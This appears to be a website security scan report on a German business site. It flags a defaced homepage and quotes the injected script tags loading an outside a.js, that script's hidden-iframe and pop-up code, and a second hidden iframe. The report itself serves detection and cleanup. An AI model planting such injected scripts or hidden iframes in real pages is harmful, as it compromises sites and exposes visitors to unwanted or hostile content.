Scanned pages/files
Request | Server response | Status |
http://www.diezwoo.de/ | 200 OK Content-Length: 18426 Content-Type: text/html | suspicious |
Deface/Content modification. The following signature was found: !--Hacked by -- <script src="http://narc.ir/mtp1376/secapps/a.js"></script><div id="jafar"></div> <script src="http://narc.ir/mtp1376/secapps/a.js"></script><div id="jafar"></div> <script src="/images/stories/a.js"></script> <!--Hacked by --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de-de" lang="de-de" > <head> <base href="http://www.diezwoo.de/" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" conten ...[21275 bytes skipped]... | ||
http://narc.ir/mtp1376/secapps/a.js | 200 OK Content-Length: 2188 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe width="0" height="0" src="http://www.secapps.org/"></iframe>'); var needpopupfck = 1; var vc_cn = "__popUp"; var link = "http://www.secapps.org/"; if (readCookiefck(vc_cn)&&readCookiefck(vc_cn)==2) { needpopupfck = 0; }else{ needpopupfck = 1; } var Page_Popped_fck = false; var Page_Loaded_fck = false; var Page_Enter_fck; if (needpopupfck == 1) { InitPopfck(); } function InitPopf window.open('javascript:void(0)', '_parent','toolbar=1,location=1,directories=1,status=1,menubar=1,scrollbars=1,resizable=1'); window.focus(); if(window.open(link,'_blank','toolbar=1,scrollbars=1,location=1,statusbar=1,menubar=1,resizable=1')){ window.focus(); IncrementCountfck(); } else { window.focus(); if (Page_Loaded_fck) initAdLayer(); else XBrowserAddHandlerPops(window, "load", "initAdLayer") } } } Antivirus reports:
Hidden iFrame found. size: 0x0 src: http://www.secapps.org/ <iframe width="0" height="0" src="http://www.secapps.org/"> Hidden iFrame found. size: 0x0 src: http://rahweb.com/ <iframe width="0" height="0" src="http://rahweb.com/"> | ||
http://www.diezwoo.de/images/stories/a.js | 200 OK Content-Length: 1912 Content-Type: application/javascript | clean |
http://www.diezwoo.de/media/system/js/caption.js | 200 OK Content-Length: 1721 Content-Type: application/javascript | clean |
http://www.diezwoo.de/modules/mod_gk_news_image_1/js/engine_compress.js | 200 OK Content-Length: 6639 Content-Type: application/javascript | clean |
http://www.diezwoo.de/modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&animation_slide_speed=1000&animation_interval=5000&autoanimation=1&animation_slide_type=0&animation_text_type=0&base_bgcolor=000000&text_block_opacity=0.50&thumbnail_width=25&thumbnail_margin=4&thumbnail_border=2&thumbnail_border_color=FFFFFF&thumbnail_border_color_inactive=000000&interface_x=0&interface_y=20&clickable_slides=1 | 200 OK Content-Length: 524 Content-Type: text/javascript | clean |
http://www.diezwoo.de/plugins/content/jwsigpro/lytebox/german/lytebox.php | 200 OK Content-Length: 32027 Content-Type: text/javascript | clean |
http://www.diezwoo.de/leistungen | 200 OK Content-Length: 24576 Content-Type: text/html | clean |
http://www.diezwoo.de/modules/mod_funkyslide/js/funkyslide.js | 200 OK Content-Length: 13423 Content-Type: application/javascript | clean |
http://www.diezwoo.de/modules/mod_yoo_accordion/mod_yoo_accordion.js | 200 OK Content-Length: 1175 Content-Type: application/javascript | clean |
http://www.diezwoo.de/./index.php | 200 OK Content-Length: 18437 Content-Type: text/html | clean |
http://www.diezwoo.de/printmedien | 200 OK Content-Length: 23167 Content-Type: text/html | clean |
http://www.diezwoo.de/printmedien/61-news2 | 200 OK Content-Length: 24081 Content-Type: text/html | clean |
http://www.diezwoo.de/archiv | 200 OK Content-Length: 24480 Content-Type: text/html | clean |
http://www.diezwoo.de/archiv/1/61-news2 | 200 OK Content-Length: 24137 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: diezwoo.de
Result:
GET / HTTP/1.1
Host: diezwoo.de
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: diezwoo.de
Referer: http://www.google.com/search?q=diezwoo.de
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: diezwoo.de
Referer: http://www.google.com/search?q=diezwoo.de
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=diezwoo.de
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://diezwoo.de/
Result: diezwoo.de is not infected or malware details are not published yet.
Result: diezwoo.de is not infected or malware details are not published yet.